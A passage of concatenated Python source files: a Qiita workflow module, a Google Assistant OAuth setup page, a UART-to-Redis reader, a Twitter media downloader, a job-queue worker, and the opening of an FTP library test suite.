# multiple times, so caching in here
all_nodes = {n: (n.command, n.parameters)
for n in in_degrees}
roots = {n: (n.command, n.parameters)
for n, d in viewitems(in_degrees) if d == 0}
# Check that we have all the required parameters
root_cmds = set(c for c, _ in viewvalues(roots))
if root_cmds != set(req_params):
error_msg = ['Provided required parameters do not match the '
'initial set of commands for the workflow.']
missing = [c.name for c in root_cmds - set(req_params)]
if missing:
error_msg.append(
' Command(s) "%s" are missing the required parameter '
'set.' % ', '.join(missing))
extra = [c.name for c in set(req_params) - root_cmds]
if extra:
error_msg.append(
' Parameters for command(s) "%s" have been provided, '
'but they are not the initial commands for the '
'workflow.' % ', '.join(extra))
raise qdb.exceptions.QiitaDBError(''.join(error_msg))
# Start creating the root jobs
node_to_job = {
n: ProcessingJob.create(
user,
qdb.software.Parameters.from_default_params(
p, req_params[c]), force)
for n, (c, p) in viewitems(roots)}
root_jobs = node_to_job.values()
# SQL used to create the edges between jobs
sql = """INSERT INTO qiita.parent_processing_job
(parent_id, child_id)
VALUES (%s, %s)"""
# Create the rest of the jobs. These are different from the root
# jobs because they depend on other jobs to complete in order to be
# submitted
for n in nx.topological_sort(dflt_g):
if n in node_to_job:
# We have already visited this node
# (because it is a root node)
continue
cmd, dflt_params = all_nodes[n]
job_req_params = {}
parent_ids = []
# Each incoming edge represents an artifact that is generated
# by the source job of the edge
for source, dest, data in dflt_g.in_edges(n, data=True):
# Retrieve the id of the parent job - it already exists
# because we are visiting the nodes in topological order
source_id = node_to_job[source].id
parent_ids.append(source_id)
# Get the connections between the job and the source
connections = data['connections'].connections
for out, in_param in connections:
# We take advantage of the fact the parameters are
# stored in JSON to encode the name of the output
# artifact from the previous job
job_req_params[in_param] = [source_id, out]
# At this point we should have all the required parameters for
# the current job, so create it
new_job = ProcessingJob.create(
user, qdb.software.Parameters.from_default_params(
dflt_params, job_req_params), force)
node_to_job[n] = new_job
# Create the parent-child links in the DB
sql_args = [[pid, new_job.id] for pid in parent_ids]
qdb.sql_connection.TRN.add(sql, sql_args, many=True)
return cls._common_creation_steps(user, root_jobs, name)
@classmethod
def from_scratch(cls, user, parameters, name=None, force=False):
"""Creates a new processing workflow from scratch
Parameters
----------
user : qiita_db.user.User
The user creating the workflow
parameters : qiita_db.software.Parameters
The parameters of the first job in the workflow
name : str, optional
Name of the workflow. Default: generated from user's name
force : bool
Force creation on duplicated parameters
Returns
-------
qiita_db.processing_job.ProcessingWorkflow
The newly created workflow
"""
job = ProcessingJob.create(user, parameters, force)
return cls._common_creation_steps(user, [job], name)
@property
def name(self):
""""The name of the workflow
Returns
-------
str
The name of the workflow
"""
with qdb.sql_connection.TRN:
sql = """SELECT name
FROM qiita.processing_job_workflow
WHERE processing_job_workflow_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
return qdb.sql_connection.TRN.execute_fetchlast()
@property
def user(self):
"""The user that created the workflow
Returns
-------
qdb.user.User
The user that created the workflow
"""
with qdb.sql_connection.TRN:
sql = """SELECT email
FROM qiita.processing_job_workflow
WHERE processing_job_workflow_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
email = qdb.sql_connection.TRN.execute_fetchlast()
return qdb.user.User(email)
@property
def graph(self):
"""Returns the graph of jobs that represent the workflow
Returns
-------
networkx.DiGraph
The graph representing the workflow
"""
g = nx.DiGraph()
with qdb.sql_connection.TRN:
# Retrieve all graph workflow nodes
sql = """SELECT parent_id, child_id
FROM qiita.get_processing_workflow_edges(%s)"""
qdb.sql_connection.TRN.add(sql, [self.id])
edges = qdb.sql_connection.TRN.execute_fetchindex()
nodes = {}
if edges:
nodes = {jid: ProcessingJob(jid)
for jid in set(chain.from_iterable(edges))}
edges = [(nodes[s], nodes[d]) for s, d in edges]
g.add_edges_from(edges)
# It is possible that there are root jobs that don't have any
# children, so they do not appear in the edge list
sql = """SELECT processing_job_id
FROM qiita.processing_job_workflow_root
WHERE processing_job_workflow_id = %s"""
sql_args = [self.id]
if nodes:
sql += " AND processing_job_id NOT IN %s"
sql_args.append(tuple(nodes))
qdb.sql_connection.TRN.add(sql, sql_args)
nodes = [
ProcessingJob(jid)
for jid in qdb.sql_connection.TRN.execute_fetchflatten()]
g.add_nodes_from(nodes)
return g
def _raise_if_not_in_construction(self):
"""Raises an error if the workflow is not in construction
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the workflow is not in construction
"""
with qdb.sql_connection.TRN:
# To know if the workflow is in construction or not it suffices
# to look at the status of the root jobs
sql = """SELECT DISTINCT processing_job_status
FROM qiita.processing_job_workflow_root
JOIN qiita.processing_job USING (processing_job_id)
JOIN qiita.processing_job_status
USING (processing_job_status_id)
WHERE processing_job_workflow_id = %s"""
qdb.sql_connection.TRN.add(sql, [self.id])
res = qdb.sql_connection.TRN.execute_fetchflatten()
# If the above SQL query returns a single element and the value
# is different from in construction, it means that all the jobs
# in the workflow are in the same status and it is not
# 'in_construction', hence raise the error. If the above SQL query
# returns more than one value (len(res) > 1), it means that the workflow
# is no longer in construction because some jobs have been submitted
# for processing. Note that if the above query doesn't return any
# value, it means that no jobs are in the workflow and that means
# that the workflow is in construction.
if (len(res) == 1 and res[0] != 'in_construction') or len(res) > 1:
# The workflow is no longer in construction, raise an error
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Workflow not in construction")
def add(self, dflt_params, connections=None, req_params=None,
opt_params=None, force=False):
"""Adds a new job to the workflow
Parameters
----------
dflt_params : qiita_db.software.DefaultParameters
The DefaultParameters object used
connections : dict of {qiita_db.processing_job.ProcessingJob:
{str: str}}, optional
Dictionary keyed by the jobs in which the new job depends on,
and values is a dict mapping between source outputs and new job
inputs
req_params : dict of {str: object}, optional
Any extra required parameter values, keyed by parameter name.
Default: None, all the required parameters are provided through
the `connections` dictionary
opt_params : dict of {str: object}, optional
The optional parameters to change from the default set, keyed by
parameter name. Default: None, use the values in `dflt_params`
force : bool
Force creation on duplicated parameters
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the workflow is not in construction
"""
with qdb.sql_connection.TRN:
self._raise_if_not_in_construction()
if connections:
# The new Job depends on previous jobs in the workflow
req_params = req_params if req_params else {}
# Loop through all the connections to add the relevant
# parameters
for source, mapping in viewitems(connections):
source_id = source.id
for out, in_param in viewitems(mapping):
req_params[in_param] = [source_id, out]
new_job = ProcessingJob.create(
self.user, qdb.software.Parameters.from_default_params(
dflt_params, req_params, opt_params=opt_params), force)
# SQL used to create the edges between jobs
sql = """INSERT INTO qiita.parent_processing_job
(parent_id, child_id)
VALUES (%s, %s)"""
sql_args = [[s.id, new_job.id] for s in connections]
qdb.sql_connection.TRN.add(sql, sql_args, many=True)
qdb.sql_connection.TRN.execute()
else:
# The new job doesn't depend on any previous job in the
# workflow, so it is a new root job
new_job = ProcessingJob.create(
self.user, qdb.software.Parameters.from_default_params(
dflt_params, req_params, opt_params=opt_params), force)
sql = """INSERT INTO qiita.processing_job_workflow_root
(processing_job_workflow_id, processing_job_id)
VALUES (%s, %s)"""
sql_args = [self.id, new_job.id]
qdb.sql_connection.TRN.add(sql, sql_args)
qdb.sql_connection.TRN.execute()
return new_job
def remove(self, job, cascade=False):
"""Removes a given job from the workflow
Parameters
----------
job : qiita_db.processing_job.ProcessingJob
The job to be removed
cascade : bool, optional
If true, also remove the input job's children. Default: False.
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the workflow is not in construction
If the job to be removed has children and `cascade` is `False`
"""
with qdb.sql_connection.TRN:
self._raise_if_not_in_construction()
# Check if the given job has children
children = list(job.children)
if children:
if not cascade:
raise qdb.exceptions.QiitaDBOperationNotPermittedError(
"Can't remove job '%s': it has children" % job.id)
else:
# We need to remove all the job's children first
# and then remove the current job
for c in children:
self.remove(c, cascade=True)
# Remove any edges (it can only appear as a child)
sql = """DELETE FROM qiita.parent_processing_job
WHERE child_id = %s"""
qdb.sql_connection.TRN.add(sql, [job.id])
# Remove as root job
sql = """DELETE FROM qiita.processing_job_workflow_root
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [job.id])
# Remove the input reference
sql = """DELETE FROM qiita.artifact_processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [job.id])
# Remove the job
sql = """DELETE FROM qiita.processing_job
WHERE processing_job_id = %s"""
qdb.sql_connection.TRN.add(sql, [job.id])
qdb.sql_connection.TRN.execute()
def submit(self):
"""Submits the workflow to execution
Raises
------
qiita_db.exceptions.QiitaDBOperationNotPermittedError
If the workflow is not in construction
"""
with qdb.sql_connection.TRN:
self._raise_if_not_in_construction()
g = self.graph
# In order to avoid potential race conditions, we are going to set
# all the children in 'waiting' status before submitting
# the root nodes
in_degrees = g.in_degree()
roots = []
for job, degree in viewitems(in_degrees):
if degree == 0:
roots.append(job)
else:
job._set_status('waiting')
for job in roots:
job.submit()
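# Illustrative usage sketch: a minimal outline of how the classes above might
# be wired together, assuming a fully configured Qiita deployment. The email,
# the DefaultParameters id and the 'input_data' parameter name below are
# hypothetical placeholders rather than values taken from this module.
if __name__ == '__main__':
    user = qdb.user.User('demo@example.com')        # hypothetical user
    dflt = qdb.software.DefaultParameters(1)        # hypothetical parameter set
    params = qdb.software.Parameters.from_default_params(dflt, {'input_data': 1})
    # Build a single-job workflow and submit its root job for execution
    wf = ProcessingWorkflow.from_scratch(user, params, name='demo workflow')
    wf.submit()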
|
hassio_oauth.py
|
"""Run small webservice for oath."""
import json
import sys
from pathlib import Path
import threading
import time
import cherrypy
from requests_oauthlib import OAuth2Session
from google.oauth2.credentials import Credentials
HEADERS = str("""
<link rel="icon" href="/static/favicon.ico?v=1">
<link href="/static/css/style.css" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
""")
class oauth2Site(object):
"""Website for handling oauth2."""
def __init__(self, user_data, cred_file):
"""Init webpage."""
self.cred_file = cred_file
self.user_data = user_data
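# The out-of-band redirect URI below makes Google display the authorization
# code directly to the user, who then pastes it into the form served by
# index() further down.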
self.oauth2 = OAuth2Session(
self.user_data['client_id'],
redirect_uri='urn:ietf:wg:oauth:2.0:oob',
scope="https://www.googleapis.com/auth/assistant-sdk-prototype"
)
self.auth_url, _ = self.oauth2.authorization_url(self.user_data['auth_uri'], access_type='offline', prompt='consent')
@cherrypy.expose
def index(self):
"""Landing page."""
return str("""<html>
<head>{headers}</head>
<body>
<form method="get" action="token">
<div class="card">
<div class="card-content">
<img src="/static/logo.png" alt="Google Assistant Logo" />
<h1>Google Assistant SDK</h1>
<p>Initial setup</p>
<ol>
<li><a href="{url}" target="_blank">Get a code from Google here</a></li>
<li><input type="text" value="" name="token" placeholder="Paste the code here" /></li>
</ol>
</div>
<div class="card-actions">
<button type="submit">CONNECT</button>
</div>
</div>
</form>
</body>
</html>""").format(url=self.auth_url, headers=HEADERS)
@cherrypy.expose
def token(self, token):
"""Read access token and process it."""
try:
self.oauth2.fetch_token(self.user_data['token_uri'], client_secret=self.user_data['client_secret'], code=token)
except Exception as e:
cherrypy.log("Error with the given token: {error}".format(error=str(e)))
cherrypy.log("Restarting authentication process.")
raise cherrypy.HTTPRedirect('/')
# create credentials
credentials = Credentials(
self.oauth2.token['access_token'],
refresh_token=self.oauth2.token.get('refresh_token'),
token_uri=self.user_data['token_uri'],
client_id=self.user_data['client_id'],
client_secret=self.user_data['client_secret'],
scopes=self.oauth2.scope
)
# write credentials json file
with self.cred_file.open('w') as json_file:
json_file.write(json.dumps({
'refresh_token': credentials.refresh_token,
'token_uri': credentials.token_uri,
'client_id': credentials.client_id,
'client_secret': credentials.client_secret,
'scopes': credentials.scopes,
}))
threading.Thread(target=self.exit_app).start()
return str("""<html>
<head>{headers}</head>
<body>
<div class="card">
<div class="card-content">
<img src="/static/logo.png" alt="Google Assistant Logo" />
<h1>Google Assistant SDK</h1>
<p>Setup completed.</p>
<p>You can now close this window.</p>
</div>
</div>
</body>
</html>""").format(url=self.auth_url, headers=HEADERS)
def exit_app(self):
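# Short delay so CherryPy can finish delivering the success page before the
# engine is stopped.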
time.sleep(2)
cherrypy.engine.exit()
def hide_access_logs():
"""Hide file access logging for cleaner logs"""
access_log = cherrypy.log.access_log
for handler in tuple(access_log.handlers):
access_log.removeHandler(handler)
if __name__ == '__main__':
oauth_json = Path(sys.argv[1])
cred_json = Path(sys.argv[2])
with oauth_json.open('r') as data:
user_data = json.load(data)['installed']
hide_access_logs()
cherrypy.config.update({'server.socket_port': 9324, 'server.socket_host': '0.0.0.0'})
cherrypy.quickstart(oauth2Site(user_data, cred_json), config={
'/static': {
'tools.staticdir.on': True,
'tools.staticdir.dir': '/usr/share/public'
}
})
|
msg_uart_reader.py
|
#!/usr/bin/env python3
import argparse
import serial
import time
import redis
import logging
import traceback
import threading
import queue
import sys,os
sys.path.append(os.path.abspath(os.path.dirname(__file__))+"/lib")
# import message_object
from message_object import MessageObject
def redis_connection_open(host,port,database):
redis_conn = redis.Redis(host=host,port=port,db=database)
return redis_conn
def redis_connection_close(redis):
redis.close()
return True
def redis_write_message(msg,redis_conn,redis_list):
return redis_conn.lpush(redis_list, msg)
def validate_deviceid_drop_list(device_id,drop_list):
if device_id in drop_list:
return True
return False
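# Consumer thread: drains the shared queue, appends every accepted message to
# the local log file and pushes it onto each configured Redis list.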
def write_message_to_storage(processing_queue,redis_lists):
global msg_received_count
while True:
msg = processing_queue.get()
msg_received_count += 1
logging.debug("Processing {sensor_id}:{measurment_id}:{cycle}" \
.format(sensor_id=msg.get_device_id(),measurment_id=msg.get_measure_code(),cycle=msg.get_cycle_number())
)
if validate_deviceid_drop_list(msg.get_device_id(),msg_drop_by_deviceid):
processing_queue.task_done()
continue
# writing to file
try:
radio_log.write("{msgd}\n".format(msgd=msg.export_message()))
if msg_received_count % 100 == 0:
logging.info("Messages processed: {msg_c}".format(msg_c=msg_received_count))
radio_log.flush()
except Exception:
traceback.print_exc()
logging.error(traceback.print_exc())
# writing to redis
for r_list in redis_lists:
try:
redis_writing_status = redis_write_message(msg=msg.export_message(),redis_conn=redis_connection,redis_list=r_list)
if redis_writing_status == False:
logging.error("Problem with writing message to redis database")
except Exception:
traceback.print_exc()
logging.error(traceback.print_exc())
processing_queue.task_done()
####
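# Default configuration; each value below can be overridden through the CLI
# arguments defined further down.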
uart_speed = 460800
uart_port = '/dev/ttyAMA0'
redis_server = "localhost"
redis_port = 6379
redis_lists = ["metrics_pubsub","metrics_graphite","metrics_webapi"]
redis_database = 0
msg_logger_file = "{homedir}/radio_msg.log".format(homedir=os.path.expanduser("~"))
msg_logger_debug = "{homedir}/msg_uart_reader.log".format(homedir=os.path.expanduser("~"))
msg_received_count = 0
msg_drop_by_deviceid = ["99"]
messages_queue = queue.Queue()
# CLI parser
cli_parser = argparse.ArgumentParser(description='Script for getting messages from RPI UART and putting them into redis database')
cli_parser.add_argument('--uart-speed', action='store', type=int, required=False, default=uart_speed,help="UART port speed")
cli_parser.add_argument('--uart-port', action='store', type=str, required=False, default=uart_port,help="UART port in OS")
cli_parser.add_argument('--redis-port', action='store', type=int, required=False, default=redis_port,help="Redis port to connect too")
cli_parser.add_argument('--redis-server', action='store', type=str, required=False, default=redis_server,help="Redis server host address")
cli_parser.add_argument('--redis-list', action='append', type=str, required=False, default=redis_lists,help="Redis list(s) to push messages to")
cli_parser.add_argument('--redis-database', action='store', type=int, required=False, default=redis_database,help="Redis database number to use")
cli_parser.add_argument('--logger-file', action='store', type=str, required=False, default=msg_logger_file,help="Name of the file to store data (beside Redis)")
cli_parser.add_argument('--logger-debug',action='store', type=str, required=False, default=msg_logger_debug, help="File with internal debug and other logs")
cli_args = cli_parser.parse_args()
logging.basicConfig(
format='%(asctime)s %(levelname)s [%(threadName)10s]: %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
level=logging.DEBUG,
handlers=[
logging.FileHandler(cli_args.logger_debug),
logging.StreamHandler()
]
)
logging.info("Setting up env")
if __name__ == '__main__':
# create serial handler
logging.info("Setting up serial connection")
serial_proxy = serial.Serial(cli_args.uart_port, cli_args.uart_speed, timeout=1)
serial_proxy.flush()
# open redis communication
logging.info("Setting up Redis connection")
redis_connection = redis_connection_open(host=cli_args.redis_server,port=cli_args.redis_port,database=cli_args.redis_database)
logging.info("Setting up local file for writing")
radio_log = open(cli_args.logger_file,'a')
logging.info("Setting up threads")
thread_msg_writer = threading.Thread(name="msgWriter", target=write_message_to_storage, args=(messages_queue,cli_args.redis_list))
thread_msg_writer.daemon = True
thread_msg_writer.start()
logging.info("Reading messages from serial in loop")
while True:
if serial_proxy.in_waiting > 0:
try:
line = serial_proxy.readline().decode('ascii').strip()
logging.info("RAW MSG received: {msg}".format(msg=line))
if MessageObject.detect_version(line):
msg = MessageObject(line)
# put message to queue for further processing
if msg.validate() == True:
messages_queue.put(msg)
logging.debug("Message queued: {sensor_id}:{measurment_id}:{cycle}" \
.format(sensor_id=msg.get_device_id(),measurment_id=msg.get_measure_code(),cycle=msg.get_cycle_number())
)
else:
logging.warning("msg decoding erros")
logging.debug("Parsing errors: {err}".format(err = ",".join(msg.get_validation_errors())))
except Exception:
traceback.print_exc()
logging.error(traceback.print_exc())
messages_queue.join()
redis_connection_close(redis_connection)
radio_log.flush()
radio_log.close()
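# Example invocation (the values shown are the defaults above and are
# illustrative only):
#   python3 msg_uart_reader.py --uart-port /dev/ttyAMA0 --uart-speed 460800 \
#       --redis-server localhost --redis-port 6379 --redis-database 0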
|
twitter.py
|
# MIT License
#
# Copyright (c) 2019 Philip Woldhek
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import signal
import sys
from os import getcwd
from pathlib import Path
from pickle import dump
from pickle import load
from queue import Queue
from re import compile
from threading import Thread
from time import sleep
from urllib.parse import urlparse
import requests
import twint
import youtube_dl
from bs4 import BeautifulSoup
working_dir = getcwd()
class Twitter(object):
def __init__(self, usernames, location, get_videos=True, keep_log=True,
ignore_errors=True, get_photos=True, logger=""):
self.get_photos = get_photos
self.get_videos = get_videos
self.queue = Queue()
self.crawling = True
self.usernames = usernames
self.ignore_errors = ignore_errors
self.download_folder = Path(location, "twitter")
self.logging = keep_log
if self.logging:
self.logger = logging.getLogger(logger)
@staticmethod
def get_soup(html):
if html is not None:
soup = BeautifulSoup(html, 'lxml')
return soup
else:
return
@staticmethod
def get_tweets(target):
c = twint.Config()
c.Username = target
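# The twint resume file keeps track of where the previous search stopped, so
# repeated runs can continue crawling instead of starting from scratch.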
c.Resume = str(Path(working_dir, "resume", "{0}_history_ids.txt".format(target)))
c.Store_object = True
c.Hide_output = True
c.Media = True
twint.run.Search(c)
tweets = twint.output.tweets_list
photo_url = []
video_url = []
for item in tweets:
url = "https://twitter.com/statuses/{0}".format(item.id)
if item.photos:
photo_url.append(url)
if item.video:
video_url.append(url)
tweets.clear()
return target, photo_url, video_url
def download_photos(self, target, urls):
if urls:
location = Path(self.download_folder, target)
photo_location = Path(location, "photos")
if not location.is_dir():
location.mkdir()
if not photo_location.is_dir():
photo_location.mkdir()
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/74.0.3729.169 Safari/537.36'}
for tweet in urls:
try:
result = requests.get(tweet, headers=headers)
except Exception as e:
self.logger.error(e)
if not self.ignore_errors:
exit(1)
continue
if result.status_code == 200:
content = result.content
soup = self.get_soup(content)
for link in soup.findAll('img', attrs={'src': compile("^https://pbs.twimg.com/media")}):
photo_url = link['src']
url_obj = urlparse(photo_url)
file_name = url_obj.path.replace("/media/", "")
path = str(Path(photo_location, file_name))
if not Path(path).is_file():
with open(path, "wb") as file:
file.write(requests.get(photo_url).content)
else:
self.logger.error("Error requesting the webpage: {0}".format(result.status_code))
if not self.ignore_errors:
exit(1)
def download_videos(self, target, urls):
if urls:
location = Path(self.download_folder, target)
video_location = Path(location, "videos")
if not location.is_dir():
location.mkdir()
if not video_location.is_dir():
video_location.mkdir()
for tweet in urls:
try:
download_path = str(Path(video_location, "%(id)s.%(ext)s"))
ydl_opts = {
"outtmpl": download_path,
"quiet": True,
"logger": self.logger,
"ignoreerrors:": self.ignore_errors
}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
ydl.download([tweet, ])
except Exception as y:
self.logger.error(y)
if not self.ignore_errors:
exit(1)
if len(urls) > 200:
sleep(2)
def sigterm_handler(self, signum, frame):
"""Handle SIGTERM: persist the download queue and exit cleanly."""
self.dump_queue()
sys.exit(0)
def dump_queue(self):
# Queue objects are not picklable (they hold thread locks) and pickle
# needs a binary file, so serialize the queued items themselves.
with open("queue", "wb") as file:
dump(list(self.queue.queue), file, protocol=4, fix_imports=False)
def load_queue(self):
with open("queue", "rb") as file:
for item in load(file, fix_imports=False, encoding="bytes"):
self.queue.put(item)
def downloader(self):
if not self.download_folder.is_dir():
self.download_folder.mkdir()
while not self.queue.empty() or self.crawling:
tweets = self.queue.get()
if self.logging:
if not tweets[1] and not tweets[2]:
pass
elif not tweets[1] and tweets[2]:
self.logger.info("{0}: downloading {1} videos".format(tweets[0], len(tweets[2])))
elif not tweets[2] and tweets[1]:
self.logger.info("{0}: downloading {1} photos".format(tweets[0], len(tweets[1])))
else:
self.logger.info(
"{0}: downloading {1} photos and {2} videos".format(tweets[0], len(tweets[1]), len(tweets[2])))
if self.get_photos:
self.download_photos(tweets[0], tweets[1])
if self.logging:
if not tweets[1]:
pass
else:
self.logger.info("{0}: photo download complete!".format(tweets[0]))
if self.get_videos:
self.download_videos(tweets[0], tweets[2])
if self.logging:
if not tweets[2]:
pass
else:
self.logger.info("{0}: video download complete!".format(tweets[0]))
if self.queue.qsize() > 0:
self.logger.info("{0} items left in the download queue".format(self.queue.qsize()))
if self.logging:
self.logger.info("Done downloading!")
def crawler(self):
resume_location = Path(working_dir, "resume")
if not resume_location.is_dir():
resume_location.mkdir()
counter = len(self.usernames)
for username in self.usernames:
if self.logging:
self.logger.info("crawling {0}".format(username))
tweets = self.get_tweets(username)
self.queue.put(tweets)
counter -= 1
if self.logging:
self.logger.info("{0} items left in crawler queue".format(counter))
self.crawling = False
if self.logging:
self.logger.info("Done crawling!")
def start(self):
if self.logging:
self.logger.info("Starting twitter module with a queue size of {0}".format(len(self.usernames)))
signal.signal(signal.SIGTERM, self.sigterm_handler)
Thread(target=self.downloader).start()
self.crawler()
def worker(usernames, location):
t = Twitter(usernames=usernames, location=location, logger="SMDL.Twitter")
t.start()
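# worker() is the module entry point: start() launches downloader() (the
# consumer) on a background thread, then runs crawler() (the producer) on the
# calling thread, with the two sides communicating through self.queue.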
|
slave.py
|
#! /usr/bin/env python
from __future__ import division
from __future__ import print_function
import os
import sys
import time
import traceback
from builtins import object
from builtins import range
from builtins import str
from past.utils import old_div
from qs.rpcclient import ServerProxy
def short_err_msg():
etype, val, tb = sys.exc_info()
msg = []
a = msg.append
a(etype.__name__)
a(": ")
a(str(val))
file, lineno, name, line = traceback.extract_tb(tb)[-1]
a(" in function %s, file %s, line %s" % (name, file, lineno))
return "".join(msg)
class Worker(object):
def __init__(self, proxy):
self.proxy = proxy
def dispatch(self, job):
self.job = job
self.jobid = job["jobid"]
self.priority = job["priority"]
self.jobid_prefix = None
method = job["channel"]
m = getattr(self, "rpc_" + method, None)
if m is None:
raise RuntimeError("no such method %r" % (method,))
kwargs = job.get("payload") or dict()
tmp = {}
for k, v in list(kwargs.items()):
if isinstance(k, str):
tmp[str(k)] = v
else:
tmp[k] = v
return m(**tmp)
def q_set_info(self, info):
return self.proxy.q_set_info(jobid=self.jobid, info=info)
def q_add(
self, channel, payload=None, jobid=None, prefix=None, wait=False, timeout=None, ttl=None
):
"""call q_add on proxy with the same priority as the current job"""
if jobid is None and prefix is not None:
jobid = "%s::%s" % (prefix, channel)
return self.proxy.q_add(
channel=channel,
payload=payload,
priority=self.priority,
jobid=jobid,
wait=wait,
timeout=timeout,
ttl=ttl,
)
def q_add_w(self, channel, payload=None, jobid=None, timeout=None):
r = self.proxy.q_add(
channel=channel,
payload=payload,
priority=self.priority,
jobid=jobid,
wait=True,
timeout=timeout,
)
error = r.get("error")
if error is not None:
raise RuntimeError(error)
return r["result"]
def main(
commands, host="localhost", port=None, numthreads=10, num_procs=0, numgreenlets=0, argv=None
):
if port is None:
port = 14311
channels = []
skip_channels = []
if argv:
import getopt
try:
opts, args = getopt.getopt(
argv, "c:s:", ["host=", "port=", "numthreads=", "numprocs=", "channel=", "skip="]
)
except getopt.GetoptError as err:
print(str(err))
sys.exit(10)
for o, a in opts:
if o == "--host":
host = a
if o == "--port":
port = int(a)
if o == "--numthreads":
numthreads = int(a)
num_procs = 0
if o == "--numprocs":
num_procs = int(a)
numthreads = 0
if o == "-c" or o == "--channel":
channels.append(a)
if o == "-s" or o == "--skip":
skip_channels.append(a)
class WorkHandler(Worker, commands):
pass
available_channels = []
for x in dir(WorkHandler):
if x.startswith("rpc_"):
available_channels.append(x[len("rpc_") :])
available_channels.sort()
if not channels:
channels = available_channels
else:
for c in channels:
assert c in available_channels, "no such channel: %s" % c
for c in skip_channels:
channels.remove(c)
assert channels, "no channels"
if num_procs:
def check_parent():
if os.getppid() == 1:
print("parent died. exiting.")
os._exit(0)
else:
def check_parent():
pass
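# Pull a single job from the queue server (retrying with an exponential
# backoff capped at roughly a minute), dispatch it to the matching rpc_*
# handler and report the result or the error back via qfinish.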
def handle_one_job(qs):
sleeptime = 0.5
while 1:
try:
job = qs.qpull(channels=channels)
break
except Exception as err:
check_parent()
print("Error while calling pulljob:", str(err))
time.sleep(sleeptime)
check_parent()
if sleeptime < 60:
sleeptime *= 2
check_parent()
# print "got job:", job
try:
result = WorkHandler(qs).dispatch(job)
except Exception as err:
print("error:", err)
try:
qs.qfinish(jobid=job["jobid"], error=short_err_msg())
traceback.print_exc()
except:
pass
return
try:
qs.qfinish(jobid=job["jobid"], result=result)
except:
pass
def start_worker():
qs = ServerProxy(host=host, port=port)
while 1:
handle_one_job(qs)
print("pulling jobs from", "%s:%s" % (host, port), "for", ", ".join(channels))
def run_with_threads():
import threading
for i in range(numthreads):
t = threading.Thread(target=start_worker)
t.start()
try:
while True:
time.sleep(2 ** 26)
finally:
os._exit(0)
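# Process-based variant: keep up to num_procs forked children alive, each of
# which handles exactly one job before exiting, and reap finished children
# with waitpid.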
def run_with_procs():
children = set()
while 1:
while len(children) < num_procs:
try:
pid = os.fork()
except:
print("failed to fork child")
time.sleep(1)
continue
if pid == 0:
try:
qs = ServerProxy(host=host, port=port)
handle_one_job(qs)
finally:
os._exit(0)
# print "forked", pid
children.add(pid)
try:
pid, st = os.waitpid(-1, 0)
except OSError:
continue
# print "done", pid
try:
children.remove(pid)
except KeyError:
pass
def run_with_gevent():
from qs.misc import CallInLoop
import gevent.pool
pool = gevent.pool.Pool()
for i in range(numgreenlets):
pool.spawn(CallInLoop(1.0, start_worker))
pool.join()
if numgreenlets > 0:
run_with_gevent()
elif num_procs > 0:
run_with_procs()
elif numthreads > 0:
run_with_threads()
else:
assert 0, "bad"
if __name__ == "__main__":
class Commands(object):
def rpc_divide(self, a, b):
print("rpc_divide", (a, b))
return old_div(a, b)
main(Commands, num_procs=2)
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import StringIO
import errno
import os
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase
from test import test_support
from test.test_support import HOST
threading = test_support.import_module('threading')
# the dummy data returned by server over the data channel when
# RETR, LIST and NLST commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024)
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def handle_error(self):
raise
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator("\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.rest = None
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = ''.join(self.in_buffer)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
